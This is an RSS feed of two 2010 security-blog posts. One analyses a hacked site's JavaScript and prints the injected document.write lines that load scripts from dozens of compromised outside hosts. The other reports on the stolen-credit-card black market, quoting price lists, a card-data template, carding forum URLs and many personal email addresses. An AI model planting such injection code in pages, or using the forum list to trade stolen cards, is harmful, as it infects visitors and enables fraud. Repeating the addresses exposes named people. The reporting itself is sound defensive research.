<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com &#187; hackers</title>
	<atom:link href="http://www.stopthehacker.com/tag/hackers/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Tue, 07 Feb 2012 14:00:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Hackers Understand the Value of Backups</title>
		<link>http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/</link>
		<comments>http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/#comments</comments>
		<pubDate>Tue, 04 May 2010 18:17:13 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[document.write]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1585</guid>
		<description><![CDATA[Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila &#8211; you have at your disposal [...]]]></description>
			<content:encoded><![CDATA[<p>Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila &#8211; you have at your disposal a &#8220;trusted&#8221; website &#8211; lots of web surfers will drop by, and in turn get infected with the hacker&#8217;s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.</p>
<p><strong>Overview</strong></p>
<p>This post will show an example of a trend about which we <a href="http://www.stopthehacker.com/2009/12/09/when-benign-scripts-attack-v/" target="_blank">first blogged</a> a few months ago. We will concentrate on the way hackers use &#8220;backup-sources&#8221; to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.</p>
<p>Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: <a href="http://www.stopthehacker.com/2009/12/02/when-benign-scripts-attack-iv/" target="_blank">here</a>.</p>
<p><strong>An Example</strong></p>
<p>Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!</p>
<p><em>Website name: ipac-bd.org<br />
Time of latest scan: 15:33:10 PDT on 2010/05/03</em></p>
<p>In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It&#8217;s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.</p>
<p><strong>The &#8220;Backup&#8221; Strategy</strong></p>
<p>Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the &#8220;loading point&#8221; for the malicious payload injected as part of the benign JavaScript. It&#8217;s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.</p>
<p>In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a &#8220;backup-strategy&#8221; well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.</p>
<div id="attachment_1590" class="wp-caption aligncenter" style="width: 619px"><img src="http://www.stopthehacker.com/wp-content/uploads/2010/05/hacker-backup-e1273450693501.jpg" alt="Frequency distribution of infected websites used in the transmission of malware." title="Frequency distribution of infected websites used in the transmission of malware." width="609" height="324" class="size-full wp-image-1590" /><p class="wp-caption-text">Frequency distribution of infected websites used in the transmission of malware.</p></div>
<p><span id="more-1585"></span><br />
<strong>Example Code</strong></p>
<pre class="brush: plain; title: ; notranslate">
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}

// Safari returns margins on body which is incorrect if the child is absolutely
// positioned.  For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
Position.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop  || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;

element = element.offsetParent;
} while (element);

return [valueL, valueT];
}
}
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://kazaadownloadpro.com/images/info.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mesalina.pl/logs/COPYRIGHT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://mariupol.com.ua/marso/inc_akcii.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://nzoz.org/css/paginacja.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://1-2-3security.com/images/products_housing.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://devinjarvis.com/modlogan/index.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://forumonly5.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://balajidentalcare.com/images/gifimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://coimbatore4u.com/WAP/default.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://coimbatore4u.com/WAP/default.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://coimbatore4u.com/WAP/default.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://precilub.com/lang/favicon.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://asterisk-e-services.com/server/faq.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://asterisk-e-services.com/server/faq.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://asterisk-e-services.com/server/faq.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://newlifecareplus.com/images/LeftBar.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://bollyqueens.com/hot/showtopad.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://completecompliance.co.in/img/legislationSEP1.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://paragonfumigation.com/images/contactus.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://eumentum.com/newtrans/page_home.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://travelgenerators.com/Images/Dubai.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php &gt;&lt;/script&gt;');
document.write('&lt;script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php &gt;&lt;/script&gt;');
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/05/04/hackers-understand-the-value-of-backups/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>The &#8220;Underground&#8221; Credit Card Blackmarket</title>
		<link>http://www.stopthehacker.com/2010/03/03/the-underground-credit-card-blackmarket/</link>
		<comments>http://www.stopthehacker.com/2010/03/03/the-underground-credit-card-blackmarket/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 17:10:10 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blackmarket]]></category>
		<category><![CDATA[card skimming]]></category>
		<category><![CDATA[credit card]]></category>
		<category><![CDATA[cvv]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1420</guid>
		<description><![CDATA[Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of TJX Companies (owner of T.J. Maxx) and Heartland Payment Systems show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate [...]]]></description>
			<content:encoded><![CDATA[<p>Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of <a href="http://news.cnet.com/8301-1009_3-10320761-83.html" target="_blank">TJX Companies</a> (owner of T.J. Maxx) and <a href="http://www.msnbc.msn.com/id/28758856/" target="_blank">Heartland Payment Systems</a> show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate (but stolen) information fuels a world of cyber crime.</p>
<p>In this article we show that, unlike what you might think, the credit card black-market operates very much in the open. Below we point out websites, which can be used to tap into the cyber black-market and find stolen credit card numbers and the associated credentials to purchase for any purpose they desire. We also show instant messenger handles, emails and details of what cyber criminals are selling on the Internet.</p>
<p>We analyzed 429 unique domains and 615 unique URLs. Each of these URLs contained information about buying stolen credit card information. Each URL lead to a web page where cyber-criminals have posted details about how to interact with them and buy stolen financial credentials. In the majority of cases, cyber criminals who are selling this information can provide one of the following types of data.</p>
<p>The data for this article was collected between February 27th and March 2nd, 2010.</p>
<p><strong>Basic Credit Card Information Offers:</strong></p>
<p>Usually consists of credit card number, type, expiration date and CVV.</p>
<pre class="brush: plain; title: ; notranslate">USA &amp; CANADA CCV2

VISA/Mastercard ~ 2USD/each
AmEX/Discover   ~ 4 USD/each

UK &amp; WU CVV2

VISA/Mastercard ~ 3USD/each
AmEx/Discover   ~ 5USD/each
</pre>
<p><strong>Premium Credit Card Information Offers:</strong></p>
<p>Usually consists of credit card number, type, expiration date, CVV, SSN, Home Address, Full Name, Date of Birth and much more.</p>
<pre class="brush: plain; title: ; notranslate">USA &amp; CANADA CCV2

VISA/Mastercard ~ $35/each

UK &amp; EU

VISA/Mastercard ~ $40/each

ACCOUNT INFORMATION:
First Name: xxxxx
Last Name: xxxxx
Address: xxxxx xxxxx xxxxx xxxxx
Apt:
City: Homestaed
State: FL
Zip: xxxxx
Home Phone: (xxxxx)xxxxx-xxxxx
Work Phone: (xxxxx)xxxxx-xxxxx
Email: xxxxx@yahoo.com
SSN: xxxxx-xxxxx-xxxxx
License Number: xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
License State: FL
DOB: 09/xxxxx/xxxxx

PAYMENT INFORMATION:
Credit Card Type: VISA
Number: xxxxxxxxxxxxxxx
CCV: 889
Expiration Date: 11/2008
Name: xxxxx xxxxx
Card Name First: xxxxx
Card Name Last: xxxxx
</pre>
<p><strong>PayPal Information Offers:</strong></p>
<pre class="brush: plain; title: ; notranslate">
Verified account                 ~ 20USD/each
Verified account with email pin  ~ 25USD/each
Verified acccount with full info ~ 35USD/each
unverified account               ~ 10USD/each
</pre>
<p>Some domains host multiple instances of stolen Credit Card Ads, (CC-Ads). We present the frequency distribution of CC-Ads on each unique domain below.</p>
<div id="attachment_1445" class="wp-caption aligncenter" style="width: 360px"><img class="size-full wp-image-1445" title="Frequency of CC-Ads on each unique domain." src="http://www.stopthehacker.com/wp-content/uploads/2010/03/blackmarket_sites_freq.jpeg" alt="Frequency of CC-Ads on each unique domain." width="350" height="321" /><p class="wp-caption-text">Frequency of CC-Ads on each unique domain.</p></div>
<p><strong>Interesting Highlights:</strong></p>
<ul>
<li>None of the websites advertising stolen credit card data were blacklisted by Google&#8217;s Safe Browsing List. This could potentially indicate that cyber criminals are conscientious of not discouraging visitors to these sites.</li>
<li>Cyber criminals prefer to get paid via <a href="http://www.libertyreserve.com/" target="_blank">Liberty Reserve</a> and <a href="http://www.westernunion.com/" target="_blank">Western Union</a> money transfer services.</li>
<li>Some cyber criminals have used images to provide quotations <a href="http://img144.imageshack.us/img144/2327/baseundocked2.jpg" target="_blank">[img]</a>.</li>
<li>Yahoo.com seems to be the email and instant messaging service preferred by cyber criminals.</li>
<li>Nearly 75% of sites with CC-Ads are located in the US (see graph below).</li>
</ul>
<div id="attachment_1444" class="wp-caption aligncenter" style="width: 291px"><img class="size-full wp-image-1444" title="IP Geo-location for websites with CC-Ads." src="http://www.stopthehacker.com/wp-content/uploads/2010/03/blackmarket_sites_location.jpeg" alt="IP Geo-location for websites with CC-Ads." width="281" height="229" /><p class="wp-caption-text">IP Geo-location for websites with CC-Ads.</p></div>
<p><strong>Conclusion:</strong></p>
<p>It is clear from the current state of the credit card black-market that cyber criminals can operate much too easily on the Internet. They are not afraid to put out their email addresses, in some cases phone numbers and other credentials in their advertisements. It seems that the black market for cyber criminals is not underground at all. In fact, it&#8217;s very &#8220;in your face.&#8221; Clearly a more concerted effort is required to clamp down on this problem. Simply tying up loose ends on the enterprise side is not enough to combat this problem when there is virtually nothing to stop criminals from touting their stolen wares freely in the Internet.<br />
<span id="more-1420"></span><br />
<em>Editor&#8217;s Note: We are providing a limited list of sites as an example of the brash lawbreaking behavior of these cyber criminals. We believe it is important for the purpose of this article that the reader be able to verify our statements. Additionally, we believe that consumer awareness of the problem can only serve to reduce the ease with which these criminals operate.</em></p>
<p><strong>Forums used to buy and sell stolen credit card information:</strong></p>
<pre class="brush: plain; title: ; notranslate">
*hxxp://ghostmarket.net
*hxxp://gayatheists.2.forumer.com
*hxxp://www.pakbugs.com/sell
*hxxp://forums.lava-carding.com
*hxxp://www.offcarding.forums-free.com
*hxxp://hack0rz.forums-free.com
*hxxps://security-shell.ws
*hxxp://silverspam.net
*hxxp://sellcvv2.forums-actifs.com
</pre>
<p><strong>Various instant messenger credentials <a href="http://abbeville-louisiana.olx.com/cc-fullinfo-fresh-and-paypal-login-for-sale-iid-6281088" target="_blank">[1]</a> <a href="http://www.adguru.org/stock-market-f39-sell-cvv-fresh-cheap-t61131.html" target="_blank">[2]</a> <a href="http://www.aewebworks.com/aff/forum/topic58.html" target="_blank">[3]</a> used by cyber criminals:</strong></p>
<p>People who interacted with &#8220;ubuntu_kana&#8221; (Yahoo messenger):</p>
<ul>
<li>ahmadshrief11@yahoo.com, davidlindon1@gmail.com, frankykkk@yahoo.com, suzannasuro@gmail.com, alexgenieve@hotmail.com, dave3331@gmail.com, ccvhack21@yahoo.com, trungtuyen68@yahoo.com, XUAN_CCS@YAHOO.COM, niklasjulius@rocketmail.com, boy_magnanimous@yahoo.com, FRESH_HACK2002@YAHOO.COM, vic.sell@yahoo.com</li>
</ul>
<p>People who interacted with &#8220;peeseller&#8221; (Yahoo messenger):</p>
<ul>
<li>aloopapa@yahoo.com, dumpsfresh@yahoo.com, ug.tsunami@yahoo.com, sellrep@yahoo.com,</li>
</ul>
<p>People who interacted with &#8220;bagiabancc&#8221; (Yahoo messenger):</p>
<ul>
<li>WorkusaJob@yahoo.com, david_cuong_85@yahoo.com, salulynho@yahoo.com, vang_kiban@yahoo.com, pro.cv2er@gmail.com, pro.cv2er@hotmail.com</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/03/the-underground-credit-card-blackmarket/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>

